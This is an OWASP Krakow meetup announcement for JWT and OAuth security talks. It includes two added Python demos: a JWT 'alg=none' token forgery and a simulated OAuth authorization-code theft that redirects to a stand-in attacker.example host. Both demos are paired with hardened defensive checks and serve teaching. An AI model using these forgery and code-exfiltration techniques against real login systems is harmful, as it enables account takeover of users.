OWASP Meeting in Krakow - JWT, OAuth secrets & Bug bounty
Details
Hi,
We are the Polish chapter of OWASP, a worldwide non-profit organisation focused on application security.
This time we have invited Grzegorz Niedziela and Louis Nyffenegger.
Louis Nyffenegger, the founder of PentesterLab, will talk about JSON Web Tokens (JWTs).
Grzegorz Niedziela, host of the "Bug Bounty Reports Explained" YouTube channel, will talk about OAuth security.
After the talks, we will discuss the bright and dark sides of bug bounty.
Agenda:
- JSON Web Tokens (JWTs) (Louis Nyffenegger)
Nowadays, JSON Web Tokens (JWTs) are ubiquitous, serving as session tokens, OAuth tokens, or simply as a means to pass information between applications or microservices. However, by design, JWTs contain numerous security and cryptography pitfalls that can lead to serious vulnerabilities. In this talk, we will explore how to exploit some of these issues.
- OAuth Secrets (Grzegorz Niedziela)
These days, OAuth is a key protocol, allowing us to log in with one click to many websites. As with anything, this convenience doesn't come without a cost. The cost here is the risk of an account takeover bug. And that's not only changing the redirect_uri to an attacker-controlled host, which, for many hackers, is the only attack they know. That attack won't work too well in 2024. This talk will be about exploiting smaller misconfigurations: for example, what to do if you only control the path of the redirect_uri, or how to exfiltrate the code when your open redirect doesn't preserve query parameters. It will also focus on particular auth providers and how they make things easier for attackers by being far more relaxed than the standard requires.
- After the break, we will host a discussion about bug bounty. We want to hear both sides: bug bounty hunters and companies that run bug bounty programs.
How should you report vulnerabilities? Where should you look? What should your goal be: easy bugs found en masse, or sophisticated kill chains? What should you expect? Bug bounty myths and reality.
How might a bug bounty help your organisation? What are the real costs of running a bug bounty program? What can go wrong? How do you run a good program? Bug bounty or penetration testing?
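To make the JWT talk's "pitfalls by design" concrete, here is one of the classic ones: a verifier that lets the token's own header choose the algorithm, so an attacker can set `alg` to `none` and strip the signature. This is an added example written for this page, not code from the talk or from PentesterLab; it uses only the Python standard library, and the key, claims and token layout are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo key. Real keys come from a secret store, never a source file.
SECRET = b"demo-hmac-key-not-for-production"


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _encode_parts(header: dict, claims: dict) -> str:
    return ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )


def sign_hs256(claims: dict, key: bytes) -> str:
    """Legitimate issuer: HS256 over header.payload with the shared key."""
    signing_input = _encode_parts({"alg": "HS256", "typ": "JWT"}, claims)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def forge_alg_none(claims: dict) -> str:
    """Attacker's token: header claims alg=none and the signature segment is empty.
    No key is needed, so the attacker chooses any claims they like."""
    return _encode_parts({"alg": "none", "typ": "JWT"}, claims) + "."


def verify_naive(token: str, key: bytes) -> Optional[dict]:
    """Vulnerable verifier: trusts the algorithm named in the (unauthenticated) header."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    signing_input = f"{header_b64}.{payload_b64}".encode()
    if header["alg"] == "none":
        # "No algorithm" is treated as "nothing to check": the forged claims are accepted.
        return json.loads(_b64url_decode(payload_b64))
    if header["alg"] == "HS256":
        expected = hmac.new(key, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return json.loads(_b64url_decode(payload_b64))
    return None


def verify_strict(token: str, key: bytes) -> Optional[dict]:
    """Hardened verifier: the algorithm is pinned by the verifier, never read from the token.
    Anything other than a correctly signed HS256 token is rejected."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return json.loads(_b64url_decode(payload_b64))


if __name__ == "__main__":
    good = sign_hs256({"sub": "alice", "admin": False}, SECRET)
    forged = forge_alg_none({"sub": "alice", "admin": True})
    print("naive  accepts forged token:", verify_naive(forged, SECRET))
    print("strict accepts forged token:", verify_strict(forged, SECRET))
    print("strict accepts real token:  ", verify_strict(good, SECRET))
```

The same pinning principle applies to every other header-driven choice in a JWT (`kid`, `jku`, `x5u`, and an RS256 key reused as an HS256 secret): the verifier decides which algorithm and which key are acceptable before it looks at the token, and the header is only ever allowed to select among options the verifier already trusts.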
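The two OAuth misconfigurations the abstract names, controlling only the path of the redirect_uri and exfiltrating the code through an open redirect that drops query parameters, can be simulated end to end. The following is an added example for this page, not the speaker's material: it models a relaxed authorization server that matches redirect_uri by scheme and host only (beside the exact-match check the OAuth 2.0 Security BCP calls for), a constructed open redirect at `https://client.example/redirect?to=...`, and the browser rule from RFC 7231 §7.1.2 that carries a URL fragment across a redirect when the Location header has none. All hosts, paths and the authorization code are constructed.

```python
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed client registration: exactly one callback URI is registered.
REGISTERED_REDIRECT_URIS = ["https://client.example/oauth/callback"]


def redirect_ok_loose(redirect_uri: str, registered: List[str]) -> bool:
    """Relaxed check seen on some providers: any path on a registered scheme+host passes.
    This is what gives an attacker "control of the path": an open redirect anywhere
    on client.example becomes an acceptable redirect_uri."""
    req = urlsplit(redirect_uri)
    return any(
        (req.scheme, req.netloc) == (urlsplit(r).scheme, urlsplit(r).netloc)
        for r in registered
    )


def redirect_ok_strict(redirect_uri: str, registered: List[str]) -> bool:
    """Exact string comparison, as the OAuth 2.0 Security BCP recommends.
    Extra path, query or fragment all change the string, so they are all rejected."""
    return redirect_uri in registered


def authorization_response(redirect_uri: str, code: str, response_mode: str) -> str:
    """URL the authorization server sends the browser to after consent.
    response_mode=fragment places the code in the URL fragment instead of the query."""
    if response_mode == "fragment":
        return f"{redirect_uri}#code={code}&state=xyz"
    sep = "&" if urlsplit(redirect_uri).query else "?"
    return f"{redirect_uri}{sep}code={code}&state=xyz"


def open_redirect_location(url: str) -> str:
    """Constructed open redirect at https://client.example/redirect?to=<url>:
    it 302s to `to` and discards every other query parameter, including ?code=."""
    query = parse_qs(urlsplit(url).query)
    return query["to"][0]


def browser_follow(current_url: str, location: str) -> str:
    """RFC 7231 §7.1.2: if the Location header has no fragment, the user agent
    carries the fragment of the current URL over to the new request target."""
    cur_frag = urlsplit(current_url).fragment
    if cur_frag and not urlsplit(location).fragment:
        return f"{location}#{cur_frag}"
    return location


def run_attack(response_mode: str, code: str = "constructed-code-123") -> Dict[str, object]:
    """Chain: attacker-chosen redirect_uri -> AS redirect -> open redirect -> attacker host.
    Reports which check accepted the redirect_uri, where the browser ends up,
    and whether the authorization code reached the attacker."""
    attacker_redirect_uri = "https://client.example/redirect?to=https://attacker.example/cb"
    result: Dict[str, object] = {
        "loose_accepts": redirect_ok_loose(attacker_redirect_uri, REGISTERED_REDIRECT_URIS),
        "strict_accepts": redirect_ok_strict(attacker_redirect_uri, REGISTERED_REDIRECT_URIS),
        "final_url": None,
        "code_leaked": False,
    }
    if not result["loose_accepts"]:
        return result
    as_redirect = authorization_response(attacker_redirect_uri, code, response_mode)
    location = open_redirect_location(as_redirect)   # ?code= is dropped here
    final_url = browser_follow(as_redirect, location)  # #code= survives here
    result["final_url"] = final_url
    result["code_leaked"] = code in final_url
    return result


if __name__ == "__main__":
    for mode in ("query", "fragment"):
        print(mode, run_attack(mode))
```

With `response_mode=query` the open redirect eats the code and the attacker gets nothing; switching to `response_mode=fragment` (or a response type that already uses the fragment) is the usual way to get the code across a parameter-dropping redirect. On the defensive side, only `redirect_ok_strict` stops the chain at step one, which is why exact redirect_uri matching, rather than host or prefix matching, is the check to look for when reviewing a provider.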
About our guests:
Louis Nyffenegger is a seasoned security engineer and the founder of PentesterLab, a platform dedicated to teaching web penetration testing and security code review.
Grzegorz Niedziela - I'm a hacker who documents his journey by creating and curating the best content for you in the form of videos and newsletter.
Please RSVP and save the date!
If you have a minute, please share this invitation with friends and on social media.
